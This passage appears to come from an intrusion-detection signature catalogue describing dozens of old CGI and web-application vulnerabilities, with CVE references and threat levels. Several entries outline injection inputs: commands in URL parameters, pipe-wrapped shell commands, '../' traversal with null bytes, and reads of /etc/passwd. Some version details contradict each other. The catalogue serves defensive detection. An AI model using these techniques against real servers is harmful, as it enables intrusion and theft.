Industry ID: CVE-2000-0923 Bugtraq: 1784
Signature Description: Aplio Internet Phone is a VoIP device that works with the SIP and RTP protocols. Aplio
Internet Phone 2.0.33 is the vulnerable version. URLs submitted to the device are not properly filtered for shell
metacharacters, so an attacker can send a specially crafted URL to the device and execute commands in /bin/sh.
The attacker could exploit this vulnerability to access the password stored in the configuration file, and then
connect to the device and perform additional attacks.
Signature ID: 1033
W3C Amaya Templates Server Directory Traversal Vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0272 Bugtraq: 2504
Signature Description: W3C's Amaya is a WYSIWYG Web browser and authoring program. A complementary package,
the templates server, provides the ability to retrieve templates from an Apache Web server for use in Amaya-based
authoring. W3C templates server for Amaya 1.1 is the vulnerable version; one of the scripts used by this server,
sendtemp.pl, is vulnerable to a simple directory traversal and file retrieval vulnerability. On receiving a request, this
script does insufficient parsing of the requested template file name. Remote attackers can specify a template containing
"dot dot" (../) directory traversal sequences to retrieve arbitrary files. This is a non-priority technology
vulnerability.
Signature ID: 1034
Armada Master Index directory traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0924 Bugtraq: 1772 Nessus: 10562
Signature Description: Master Index is a professional search engine in the style of Yahoo and Alta Vista. This search engine
supports many features: administrators can set the script to add submissions automatically or wait until they are confirmed
by the administrator, and users can edit and delete their listings. Armada Design Master Index 1.0 is vulnerable; it could allow a
remote attacker to traverse directories on the Web server. The 'catigory' input parameter to the search.cgi
script is not properly validated for "dot dot" (/../) sequences in URLs. No remedy available as of August 2008.
Signature ID: 1035
CCBill WhereAmI.CGI Remote Arbitrary Command Execution Vulnerability
Threat Level: Information
Bugtraq: 8095
Signature Description: CCBill uses a CGI called whereami.cgi for its technical support needs; a vulnerability in this
CGI allows remote attackers to execute commands. Whereami.cgi does not properly validate its input
parameters. Because of this, an attacker may be able to gain access to a system with the privileges of the Web server
process. It is possible to supply system commands to the "g" parameter of WhereAmI.CGI (whereami.cgi?g=command
format in a URL). Supplied commands can list file names, show the contents of the password file, or install a back
door. No remedy is available as of August 2008.
Signature ID: 1037
Emumail Webmail Cross Site Scripting Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-2334 Bugtraq: 9861
Signature Description: EMUMAIL is a group of programmers, designers, and business people united to bring
custom-tailored, cutting-edge technology to the cookie-cutter electronic messaging industry. EMUMAIL designs and
builds communications infrastructure for ISPs, corporations, individuals, and organizations worldwide. EMU Webmail
5.2.7 is vulnerable; it does not properly validate user-supplied parameters before they are returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site,
which allows an attacker to carry out cross-site scripting. No remedy available as of August 2008.
Signature ID: 1038
EMU Webmail init.emu path disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-2004-2385 CVE-2004-2334 Bugtraq: 9861
Signature Description: EMUMAIL is a group of programmers, designers, and business people united to bring
custom-tailored, cutting-edge technology to the cookie-cutter electronic messaging industry. EMUMAIL designs and
builds communications infrastructure for ISPs, corporations, individuals, and organizations worldwide. EMU Webmail
5.2.7 is vulnerable; it does not properly validate user-supplied parameters before they are returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. A
remote attacker who requests the init.emu script without parameters receives output containing the installation path of
EMU Webmail, which discloses the physical path of the script and results in a loss of confidentiality. No remedy available as of
August 2008.
Signature ID: 1039
FormHandler.cgi Directory Traversal Vulnerability
Threat Level: Severe
Industry ID: CVE-1999-1050 Bugtraq: 798,799 Nessus: 10075
Signature Description: FormHandler takes care of the basic tasks of form processing while offering some advanced features:
it can send requested files to a visitor via email, create Web-based email interfaces, and administer simple
mailing lists. Matt Wright FormHandler.cgi 2.0 is vulnerable; these versions allow attackers to read all files on
the server that the CGI script has read access to, including the /etc/passwd file. An attacker could save a local copy of
the form in which the template fields reference absolute pathnames. Once the attacker submits the local form, the
FormHandler CGI would email the /etc/passwd file to the specified email address. No remedy available as of August
2008.
Signature ID: 1040
IWeb Hyperseek 2000 Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0253 Bugtraq: 2314
Signature Description: IWeb Hyperseek Jackhammer is a search engine system. It is a powerful Perl-based script that
helps create and manage an online pay-per-click search engine on a Web site, with complete support. The major
features offered by this script include category structures of unlimited depth, top-rated relevancy matching, adult
filtering, support for multiple paid incoming "backfill" feeds, and eligibility for revenue sharing with your own
affiliates. iWeb Systems HyperSeek 2000 is vulnerable; with these versions there is a chance that arbitrary files and
directories can be read via a directory traversal attack in the show parameter to the hsx.cgi script. Patches are
available at the vendor's Web site.
Signature ID: 1041
IWeb Hyperseek 2000 Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0253 Bugtraq: 2314
Signature Description: Hyperseek Search Engine is industrial-strength directory and search engine software: SQL
database driven, feature-packed, with Web-based configuration and setup and fully template-based customization, designed for
speed, heavy traffic, and user friendliness. iWeb Systems HyperSeek 2000 is vulnerable to directory traversal.
The hsx.cgi script in these versions does not properly validate user-supplied data. A remote attacker can send
specially crafted URL requests containing '../' sequences and '%00' escape characters to the hsx.cgi script, which
will disclose directory listings and the files and directories on the target Web server for which the script has
read permission.
Signature ID: 1042
WEB-CGI LWGate access Vulnerability
Threat Level: Information
Signature Description: LWGate is a CGI script that allows WWW clients to send information to HTTP servers. It
uses the PATH_INFO variable to determine which 'page' of information is wanted. This rule is triggered when an attacker
accesses the LWGate script. Successful exploitation can allow an attacker to gain unauthorized administrative access to
the server or execute arbitrary code on the Web server.
Signature ID: 1043
MDaemon form2raw.cgi access vulnerability
Threat Level: Warning
Bugtraq: 9317
Signature Description: Alt-N Technologies provides affordable Windows-based software, including an email server,
email antivirus and antispam protection, Outlook integration, and network fax management software. MDaemon
protects users from spam and viruses, provides full security, and includes seamless Web access to email via
WorldClient and remote administration. Alt-N MDaemon/WorldClient 6.8.5 and earlier versions are vulnerable:
a remote attacker sends a request with more than 249 bytes in the "From" field to the Form2Raw.cgi script, and
processing that request causes a stack buffer overflow in MDaemon. The attacker can then execute arbitrary
code in the context of the vulnerable software in order to gain unauthorized access. Patches are not available.
Signature ID: 1044
MDaemon form2cgi buffer overflow vulnerability
Threat Level: Severe
Bugtraq: 9317
Signature Description: Alt-N Technologies provides affordable Windows-based software, including an email server,
email antivirus and antispam protection, Outlook integration, and network fax management software. MDaemon
protects users from spam and viruses, provides full security, and includes seamless Web access to email via
WorldClient and remote administration. Alt-N MDaemon/WorldClient 6.8.5 and earlier versions are vulnerable:
a remote attacker sends a request with more than 249 bytes in the "From" field to the Form2Raw.cgi script, and
processing that request causes a stack buffer overflow in MDaemon. The attacker can then execute arbitrary
code in the context of the vulnerable software in order to gain unauthorized access. Patches are not available.
Signature ID: 1045
Nph-maillist Arbitrary Code Execution vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0400 Bugtraq: 2563
Signature Description: Nph-maillist is a Perl CGI script that handles mailing lists. The email list generator is a Web-
interfaced script that allows visitors to a Web site to leave their email address so they may be notified when the
Web site is updated. The script also provides the ability to create and change the message to be sent to the list right from the
Web browser, as well as to maintain the list being generated. Matt Tourtillott nph-maillist 3.5 and 3.0 are vulnerable. In
this software the 'nph-maillist.pl' script carries all the functionality of the Web interface; a remote attacker
can enter commands embedded in an email address via the subscription form, and then force a mailing, which will
execute the commands. Patches are not available.
Signature ID: 1046
Oracle reports stack overflow vulnerability
Threat Level: Information
Industry ID: CVE-2002-0947 Bugtraq: 4848
Signature Description: Reports Server is a commercially available reporting package distributed by Oracle. A stack
overflow has been reported in one of the Oracle Reports Server CGI programs (rwcgi60). This condition may be
triggered by supplying an overly long string as a value for the 'setauth' method. This buffer overflow may allow a user
to remotely execute code on a vulnerable system. In doing so, a remote user may be able to gain access to the local
system, potentially with the privileges of the Web server. Oracle9i Application Server Reports 9.0.2 and Oracle
Reports6i 6.0.8 are prone to this vulnerability.
Signature ID: 1047
SGI IRIX infosearch fname Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0207 Bugtraq: 1031
Signature Description: IRIX is a computer operating system developed by SGI to run natively on their 32-bit and 64-bit
MIPS architecture workstations and servers. The InfoSearch package converts man pages and other documentation
into HTML Web content; its search form uses infosrch.cgi. SGI IRIX 6.5.7 and earlier versions are vulnerable: these
versions do not properly validate the user input to the 'fname' variable of the infosrch.cgi script, allowing commands
to be executed at the Web server privilege level by remote Web users. Patches are available at the SGI Web site.
Signature ID: 1048
SIX-webboard 2.01 File Retrieval vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1115 Bugtraq: 3175
Signature Description: SIX-webboard is a Web bulletin board application developed by Sixhead. The generate.cgi
script in SIX-webboard version 2.01 is vulnerable; it could allow a remote attacker to traverse directories on the Web
server. There is no proper validation of user input to the content parameter, so an attacker can send a request
URL containing 'dot dot' sequences (/../) in the "content" parameter to the "generate.cgi" script to traverse directories and
view arbitrary files outside the Web root directory. No remedy available as of August 2008.
Signature ID: 1050
Talentsoft Web+ Example Script File Disclosure Vulnerability
Threat Level: Information
Bugtraq: 1725
Signature Description: Web+ is a development language for creating Web-based client/server applications. In
Linux versions of the product, an example script installed with Web+ (Web+Ping) fails to correctly filter shell
metacharacters. As a result, parameters passed to this script may contain malicious shell commands, allowing an attacker to
remotely execute or read any file which is accessible to the Web+ user. Windows NT versions of Web+ are apparently
not vulnerable. TalentSoft Web+ Application Server (Linux) 4.6 is prone to this vulnerability.
Signature ID: 1051
Bytes Interactive Web Shopper Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0922 Bugtraq: 1776
Signature Description: Web Shopper is a shopping cart and cart management product by Bytes Interactive. It can be
used to develop both a catalogue and custom HTML pages, and allows the designer to determine the layout,
language, currency, and overall look of a shopping cart. Bytes Interactive Web Shopper 2.0 and Bytes Interactive
Web Shopper 1.0 are vulnerable versions. By default, the newpage variable is not properly validated for "dot dot" (/../)
sequences, so a remote attacker can submit a specially crafted URL containing "dot dot" (/../) sequences to view
arbitrary files on the Web server, such as /etc/passwd. Successful exploitation could give a remote intruder
read access to any known file.
Signature ID: 1052
Web Shopper shopper.cgi directory traversal vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0922 Bugtraq: 1776
Signature Description: Web Shopper is a shopping cart and cart management product by Bytes Interactive. It can
be used to develop both a catalogue and custom HTML pages, and allows the designer to determine the layout,
language, currency, and overall look of a shopping cart. Bytes Interactive Web Shopper shopping cart program
(shopper.cgi) 2.0 and earlier versions are vulnerable; these versions may allow a remote attacker to traverse directories on
the server. By default, the newpage variable is not properly checked for "dot dot" (/../) sequences. A remote
attacker can submit a specially crafted URL containing "dot dot" sequences in the newpage parameter to the
shopper.cgi script and then view arbitrary files on the Web server, such as /etc/passwd. No remedy available as of
August 2008.
Signature ID: 1053
Drummon Miles A1Stats Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0561 CVE-2001-0562 Bugtraq: 2705 Nessus: 10669
Signature Description: A1Stats is a CGI product by Drummond Miles used to report on a Web site's visitor
traffic. Drummond Miles A1Stats 1.6 and prior versions are vulnerable: these versions do not properly validate
the user-supplied input submitted as query strings to the Aa1disp3.cgi script. An attacker can craft a long
path including '/../' sequences and submit it as a file request to the product's built-in Web server. Such sequences
are not filtered from the path, permitting the attacker to specify files outside the directory tree normally available to
users. Patches are available at the vendor's Web site.
Signature ID: 1054
Drummon Miles A1Stats Directory Traversal Vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0561 CVE-2001-0562 Bugtraq: 2705 Nessus: 10669
Signature Description: A1Stats is a CGI product by Drummond Miles used to report on a Web site's visitor
traffic. Drummond Miles A1Stats 1.6 and prior versions are vulnerable: these versions do not properly validate
the user-supplied input submitted as query strings to the Aa1disp2.cgi and Aa1disp4.cgi scripts. An attacker can
craft a long path including '/../' sequences and submit it as a file request to the product's built-in Web server.
Such sequences are not filtered from the path, permitting the attacker to specify files outside the directory
tree normally available to users. Patches are available at the vendor's Web site.
Signature ID: 1055
A1Stats Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0561 CVE-2001-0562 Bugtraq: 2705 Nessus: 10669
Signature Description: A1Stats is a CGI product by Drummond Miles used to report on a Web site's visitor
traffic. Version 1.0 of this product fails to properly validate user-supplied input submitted as query strings to the A1Stats
script. An attacker can compose a long path including '/../' sequences and submit it as a file request to the product's
built-in Web server. 'dot dot' sequences are not filtered from the path, permitting the attacker to specify files outside
the directory tree normally available to users.
Signature ID: 1056
AdCycle Remote SQL Query Modification Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1226 Bugtraq: 3741
Signature Description: AdCycle is a set of shareware ad management scripts written in Perl and backed by
MySQL. Adcycle.com AdCycle 1.12 through Adcycle.com AdCycle 1.17 are vulnerable to this attack. These versions
may allow a remote attacker to modify the logic of an existing SQL query and manipulate the MySQL database and
other databases to which the AdCycle CGI process has access. The vulnerable versions do not properly validate
multiple unspecified CGI variables before passing them to MySQL queries. No remedy available as of August 2008.
Signature ID: 1057
Slashcode User Account Compromise Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-1748 Bugtraq: 3839
Signature Description: Slashcode is a bulletin board, discussion and portal framework. It is widely used, and is behind
the popular Slashdot site. Slashcode versions 2.1 through 2.2.2 are vulnerable: these versions allow a remote attacker
with a valid account to gain unauthorized access to other arbitrary accounts. A valid user may gain access to another
user's account or to administrative accounts, and full control of the site is possible through this exploitation. Update to
the latest version, Slashcode 2.2.3, found at the Slashcode Web site.
Signature ID: 1058
Leif M. Wright ad.cgi Unchecked Input Vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0025 Bugtraq: 2103
Signature Description: The Common Gateway Interface (CGI) is a standard protocol for interfacing external
application software with an information server, commonly a Web server. Leif M. Wright's ad.cgi 1.0 is vulnerable;
it could allow a remote attacker to execute arbitrary commands on the Web server, because it does not properly
validate user input, and so a remote attacker may gain access to restricted resources. The problem lies in the method
by which the script checks input. A remote attacker can use the FORM method and send a request with the file
parameter to execute arbitrary commands on the system with the privileges of the Web server. No remedy available
as of August 2008.
Signature ID: 1059
Alchemy Eye Remote Command Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0871 Bugtraq: 3599
Signature Description: Alchemy Eye is a network monitoring tool for Windows-based environments that monitors
server accessibility and performance; it is maintained by Alchemy Lab. Alchemy Lab Alchemy
Eye versions 2.6.19 through 3.0.10 are vulnerable. Directory traversal is possible, after which a remote attacker could
execute arbitrary commands. Successful exploitation can lead to attackers gaining access to the host. An
attacker can traverse out of the root directory by placing the MS-DOS device name "NUL" before the first "../". No
remedy available as of August 2008.
Signature ID: 1060
Alchemy Eye Remote Command Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0871 Bugtraq: 3599
Signature Description: Alchemy Eye is a network monitoring tool for Windows-based environments that monitors
server accessibility and performance; it is maintained by Alchemy Lab. Alchemy Lab Alchemy
Eye versions 2.6.19 through 3.0.10 are vulnerable. Directory traversal is possible, after which a remote attacker could
execute arbitrary commands. Successful exploitation can lead to attackers gaining access to the host. An
attacker can traverse out of the root directory by placing MS-DOS device names before the first "../". The vendor
has attempted to fix this vulnerability; Alchemy Lab Alchemy Eye 3.0.11 is not vulnerable. Update to this version,
available at the vendor's Web site.
Signature ID: 1061
Alya.cgi access vulnerability
Threat Level: Information
Nessus: 11118
Signature Description: This event is generated when an attempt is made to gain unauthorized access to a CGI
application running on a Web server. Some applications do not perform stringent checks when validating the credentials
of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly
escalated privileges to that of the administrator. Data stored on the machine can be compromised, and trust
relationships between the victim server and other hosts can be exploited by the attacker.
Signature ID: 1062
Anaconda Foundation Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0975 CVE-2001-0308 Bugtraq: 2338,2388 Nessus: 10536
Signature Description: The Anaconda Foundation Directory allows users to dynamically integrate its content
into their own site's look and feel. Anaconda Foundation Directory 1.9, Anaconda Foundation Directory 1.7, Anaconda
Foundation Directory 1.6, Anaconda Foundation Directory 1.5, and Anaconda Foundation Directory 1.4 are vulnerable
versions. A remote attacker could send a dot dot sequence ('../' technique), appending a null byte followed by
'.html' to the extension of the filename in question, to the 'apexec.pl' script in conjunction with the variable 'template'.
The received request is not properly validated, so the attacker can read any file on the Web server with the privileges of
HTTPD.
Signature ID: 1063
Anyform CGI Semicolon Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0066 Bugtraq: 719
Signature Description: AnyForm is a popular Perl CGI script that supports simple forms that deliver responses via
email: it collects data from a WWW form and sends it to a specified e-mail address. It can either use a
sendmail-type program or directly contact an SMTP host via sockets to send messages. It can be used on any platform.
AnyForm versions 1.0 and 2.0 are vulnerable: these versions do not perform sanity checking on user-supplied data and
could be exploited by remote intruders to execute arbitrary commands. These commands are issued as the UID which
the Web server runs as, typically 'nobody'. This rule detects unauthorized administrative access to the server or possible
execution of arbitrary code due to anyform2 running on the Web server. John S. Roberts AnyForm 3.0 and John S.
Roberts AnyForm 4.0 are not vulnerable, so update to either of these versions.
Signature ID: 1064
Archie access Vulnerability
Threat Level: Information
Signature Description: Archie is a program used to search for file names on Internet FTP sites and to record
information about the files. Archie applications are available from many major Internet sites. This rule is triggered
when an attacker requests 'archie'; the attacker can then gain unauthorized access and obtain sensitive
information.
Signature ID: 1065
Perlshop.cgi shopping cart program directory traversal vulnerability
Threat Level: Information
Industry ID: CVE-1999-1374
Signature Description: PerlShop.cgi allows remote users to access files in the Web root directory via HTTP
requests. This CGI fails to check authentication and allows all users to access directories other than the Web root, for
example the /store/customers/ or /store/temp_customers/ directories; using this vulnerability, remote attackers can view
sensitive information on the affected system.
Signature ID: 1067
Ax-admin.cgi access Vulnerability
Threat Level: Information
Signature Description: The ax-admin script creates a hyperlinked list of URLs. One may click on a link from the
admin server and jump right to the site, and the URL might contain sensitive information. This rule triggers
when an attacker accesses the ax-admin.cgi script; an attacker can use this vulnerability to delete logs or overwrite
system files.
Signature ID: 1068
Axs.cgi access Vulnerability
Threat Level: Information
Signature Description: The AXS script is a CGI or Perl script that keeps track of the number, source locations, and
client information of visitors to an HTTP server. It writes this data to an output file named log.txt. This rule triggers
when an attacker accesses the axs.cgi script. Successful exploitation can allow an attacker to gain sensitive information
about the site's visitors.
Signature ID: 1069
Big Brother file browsing Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1462 Bugtraq: 142 Nessus: 10025
Signature Description: Big Brother is a loosely coupled distributed set of tools for monitoring and displaying the
current status of an entire network and notifying the administrator when needed. Sean MacGuire Big Brother 1.0 9c and
Sean MacGuire Big Brother 1.0 9b are vulnerable versions. In these versions the CGI script bb-hist.sh, the new history
viewer, can be exploited to allow the partial display of local files, provided they are readable by the user ID under which
the Web server executes CGI scripts and that they are text based. Patches are available at the vendor's Web site; Sean
MacGuire Big Brother 1.0 9b is not vulnerable, so update to this version or the latest version.
Signature ID: 1070
Big Brother bb-hist.sh file browsing vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1462 Bugtraq: 142 Nessus: 10025
Signature Description: Big Brother is a loosely coupled distributed set of tools for monitoring and displaying the
current status of an entire network and notifying the administrator when needed. Sean MacGuire Big Brother 1.0 9c and
Sean MacGuire Big Brother 1.0 9b are vulnerable versions. In these versions the CGI script bb-hist.sh, the new history
viewer, can be exploited to allow the partial display of local files, provided they are readable by the user ID under which
the Web server executes CGI scripts and that they are text based. Patches are available at the vendor's Web site; Sean
MacGuire Big Brother 1.0 9b is not vulnerable, so update to this version or the latest version.
Signature ID: 1071
Bb-histlog.sh information disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1462 Bugtraq: 142 Nessus: 10025
Signature Description: Big Brother is a loosely coupled distributed set of tools for monitoring and displaying the
current status of an entire network and notifying the administrator when needed. Sean MacGuire Big Brother 1.0 9c and
Sean MacGuire Big Brother 1.0 9b are vulnerable versions. In these versions the CGI script bb-histlog.sh, the new
history logs viewer, can be exploited to allow the partial display of local files, provided they are readable by the user ID
under which the Web server executes CGI scripts and that they are text based. Patches are available at the vendor's Web site;
Sean MacGuire Big Brother 1.0 9b is not vulnerable, so update to this version or the latest version.
Signature ID: 1073
BB4 Technologies Big Brother Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0638 Bugtraq: 1455 Nessus: 10460
Signature Description: Big Brother is a loosely coupled distributed set of tools for monitoring and displaying the
current status of an entire network and notifying the administrator when needed. Big Brother 1.4h1 and earlier versions are
vulnerable: in these versions the CGI script bb-hist.sh allows remote attackers to read arbitrary files via dot dot
sequences in the HOSTSVC parameter. When the server receives this type of URL request from the client (attacker), the
attacker can exploit it to obtain a partial display of local files, provided they are readable by the user ID under which
the Web server executes CGI scripts and that they are text based. Patches are available at the vendor's Web site.
Signature ID: 1074
Big Brother bb-rep.sh base file browsing vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1462 Bugtraq: 142 Nessus: 10025
Signature Description: Big Brother is a loosely coupled distributed set of tools for monitoring and displaying the
current status of an entire network and notifying the administrator when needed. Sean MacGuire Big Brother 1.0 9c and
Sean MacGuire Big Brother 1.0 9b are vulnerable versions. In these versions the CGI script bb-rep.sh, the new history
viewer, can be exploited to allow the partial display of local files, provided they are readable by the user ID under which
the Web server executes CGI scripts and that they are text based. Patches are available at the vendor's Web site; Sean
MacGuire Big Brother 1.0 9b is not vulnerable, so update to this version or the latest version.
Signature ID: 1075
Big Brother bb-replog.sh based file browsing vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1462 Bugtraq: 142 Nessus: 10025
Signature Description: Big Brother is a loosely coupled distributed set of tools for monitoring and displaying the
current status of an entire network and notifying the administrator when needed. Sean MacGuire Big Brother 1.0 9c and
Sean MacGuire Big Brother 1.0 9b are vulnerable versions. In these versions the CGI script bb-replog.sh, the new
history viewer, can be exploited to allow the partial display of local files, provided they are readable by the user ID
under which the Web server executes CGI scripts and that they are text based. Patches are available at the vendor's Web site; Sean
MacGuire Big Brother 1.0 9d is not vulnerable, so update to this version or the latest version.
Signature ID: 1076
EXtropia bbs_forum.cgi Remote Arbitrary Command Execution Vulnerability
Threat Level: Information
Industry ID: CVE-2001-0123 Bugtraq: 2177
Signature Description: Bbs_forum.cgi is a popular Perl CGI script from eXtropia.com. It supports the creation and
maintenance of Web-based threaded discussion forums. eXtropia WebBBS version 1.0.0 could allow an attacker to
traverse directories on the Web server. This issue is triggered when an attacker sends a malformed URL containing
"dot dot" sequences (/../) to the bbs_forum.cgi script. Successful exploitation can allow an attacker to read any
file on the Web server and execute arbitrary code on the Web server. This issue is fixed in WebBBS version 2.0
or later. Install this version, available at the vendor's Web site, to remove the vulnerability.
Signature ID: 1077
Brian Stanback bslist.cgi Remote Command Execution Vulnerability
Threat Level: Information
Industry ID: CVE-2001-0100
Signature Description: This rule detects a specially crafted request to bslist.cgi that exploits its improper filtering of the ';' character. Successful exploitation allows an attacker to execute arbitrary commands on the system, for example to obtain the system's /etc/passwd file. The affected version of bslist.cgi is 1.0.0; the issue is fixed in version 1.5 or later, available from the vendor's web site.
Signature ID: 1079
Matt Kruse Calendar Arbitrary Command Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0432 Bugtraq: 1215
Signature Description: Matt Kruse's Calendar script is a popular, free Perl CGI script used by many websites on the Internet; it lets a website administrator easily set up and customize a calendar. Matt Kruse Calendar Script 2.2 allows arbitrary command execution. The script does not check user-supplied values for shell metacharacters, so a remote attacker can send a request to calender.pl that passes "|shell command|" as the value of the "configuration file" field. That value is handed to a Perl open() call, which spawns a shell that executes the command with the uid of the web server. This can give the attacker remote access to the system.
Signature ID: 1080
Matt Kruse Calendar Arbitrary Command Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0432 Bugtraq: 1215
Signature Description: Matt Kruse's Calendar script is a popular, free Perl CGI script used by many websites on the Internet; it lets a website administrator easily set up and customize a calendar. Matt Kruse Calendar Script 2.2 allows arbitrary command execution. The script does not check user-supplied values for shell metacharacters, so a remote attacker can send a request to calender_admin.pl that passes "|shell command|" as the value of the "configuration file" field. That value is handed to a Perl open() call, which spawns a shell that executes the command with the uid of the web server. This can give the attacker remote access to the system.
Signature ID: 1081
NCSA HTTPd campas sample script Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0146 Bugtraq: 1975
Signature Description: NCSA HTTPd is an HTTP server that makes hypertext and other documents available to web browsers, much as NCSA Mosaic is a program for browsing the World Wide Web; from the client-server viewpoint, NCSA HTTPd is the server to the browser client. The campas sample CGI script shipped with NCSA HTTPd 1.2 does not properly validate user-supplied input and can be used to execute commands on the host with the privileges of the web server. Commands are passed to the script as a variable, separated by %0a (linefeed) characters. Successful exploitation could be used to deface the web site, read any files the server process has access to, obtain directory listings, and run anything else the web server can run. The remedy is to upgrade the HTTP server to the latest available version and to remove sample CGI scripts that are not needed.
Signature ID: 1082
CGIScript.net csPassword.CGI Password.CGI.TMP File Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0920 Bugtraq: 4889
Signature Description: CGIScript.net provides various webmaster tools and is maintained by Mike Barone and Andy Angrick. In csPassword.cgi version 1.0, developed by CGIScript.net, a user may be able to access the temporary file (password.cgi.tmp) generated by the script, which contains usernames and unencrypted passwords. Patches may be available at the vendor (cgiscript.net) website.
Signature ID: 1084
CSSearch Remote Command Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0495 Bugtraq: 4368 Nessus: 10924
Signature Description: csSearch is a free Perl CGI search script developed by Mike Barone and Andy Angrick. csSearch stores its configuration data as Perl code in a file called "setup.cgi", which the script evaluates at runtime to load the configuration back into memory. csSearch.cgi in csSearch 2.3 and earlier does not properly validate user input, so any user can cause configuration data to be written to "setup.cgi" via the savesetup command and the "setup" parameter, and thereby execute arbitrary Perl code on the server with the privileges of the web server process. Patches are available at the cgiscript.net website.
Signature ID: 1085
Bonsai CGI request reveals path information vulnerability
Threat Level: Warning
Industry ID: CVE-2003-0153 CVE-2002-0749 Bugtraq: 4579,5517 Nessus: 11748
Signature Description: Bonsai is a tool that performs queries on the contents of a CVS archive: it can list checkins, show which checkins were made by a given person, on a given CVS branch, or in a particular time period, display checkin logs and comments, produce differences between versions of a file, and find out who is responsible for changing a particular line of code. Mozilla Bonsai 1.3 allows a remote attacker to obtain sensitive information. By sending a malformed request that produces an error, an attacker can discover the location of the Bonsai installation, because the error message shows the full path of the cvslog.cgi file and so reveals the server directory structure. Patches are available at the Debian website.
Signature ID: 1086
Mozilla Bonsai Path Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2003-0153 CVE-2002-0749 Bugtraq: 5517,4579 Nessus: 11748
Signature Description: Bonsai is a tool that performs queries on the contents of a CVS archive: it can list checkins, show which checkins were made by a given person, on a given CVS branch, or in a particular time period, display checkin logs and comments, produce differences between versions of a file, and find out who is responsible for changing a particular line of code. Mozilla Bonsai 1.3 allows a remote attacker to obtain sensitive information. By sending a malformed request that produces an error, an attacker can discover the location of the Bonsai installation, because the error message shows the full path of the cvsview2.cgi file and so reveals the server directory structure. Patches are available at the Debian website.
Signature ID: 1087
SGI IRIX 6.2 day5datacopier.cgi Untrusted search path vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1232
Signature Description: IRIX is SGI's high-performance 64-bit operating system based on industry-standard UNIX. The day5datacopier CGI script in SGI IRIX 6.2 allows a local attacker to execute arbitrary commands on the system with root privileges via a modified PATH environment variable that points to a malicious cp program. This can lead to unauthorized access and escalation of privileges to those of the administrator; data stored on the machine can be compromised, and trust relationships between the victim server and other hosts can be exploited by the attacker. No remedy was available as of August 2008.
Signature ID: 1088
SGI IRIX 6.2 day5datanotifier.cgi Untrusted search path vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1232
Signature Description: IRIX is SGI's high-performance 64-bit operating system based on industry-standard UNIX. The day5datanotifier CGI script in SGI IRIX 6.2 has the same class of flaw as day5datacopier (signature 1087): a local attacker can execute arbitrary commands with root privileges by supplying a modified PATH environment variable so that the script runs an attacker-controlled program in place of a system utility. No remedy was available as of August 2008.
Signature ID: 1089
IBM Net.Data db2www.cgi Buffer overflow vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0677
Signature Description: IBM Net.Data is a scripting language used to create web applications; it supports a wide range of language environments and is compatible with most recognized databases. IBM Net.Data 6.1 does not properly validate a specially crafted URL, sent by way of the db2www CGI application, that contains an overly long value in the PATH_INFO variable. The resulting error reveals the physical path of server files to the remote attacker, which could assist further attacks against the victim host. Patches are available at the vendor website.
Signature ID: 1090
DCForum dcboard.cgi Remote Admin Privilege Compromise Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0527 Bugtraq: 2728 Nessus: 10583
Signature Description: DCForum is a commercial CGI script from DCScripts designed to provide web-based threaded discussion forums. DC Scripts DCForum 2000 1.0 and DCForum 6.0 do not properly validate user-supplied input. An attacker can corrupt the script's user records by supplying a value for the last name field that includes URL-encoded pipes and newlines; by appending the desired values to the last name field, the attacker can insert an account record for a new user and specify admin privileges for it.
Signature ID: 1091
Dfire.cgi access vulnerability
Threat Level: Information
Industry ID: CVE-1999-0913 Bugtraq: 564
Signature Description: The Dragon-Fire IDS remote web interface, under version 1.0, contains an insecure CGI script that allows remote users to execute commands as the user nobody. This signature detects an HTTP URL request for the Dragon-Fire CGI script dfire.cgi with a pipe ("|") character in one of its arguments. Exploitation could lead to a remote compromise of the system running Dragon-Fire.
Signature ID: 1092
Netwin DNews News Server dnewsweb.cgi Buffer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0423 CVE-2002-0749 Bugtraq: 1172,4579 Nessus: 11748
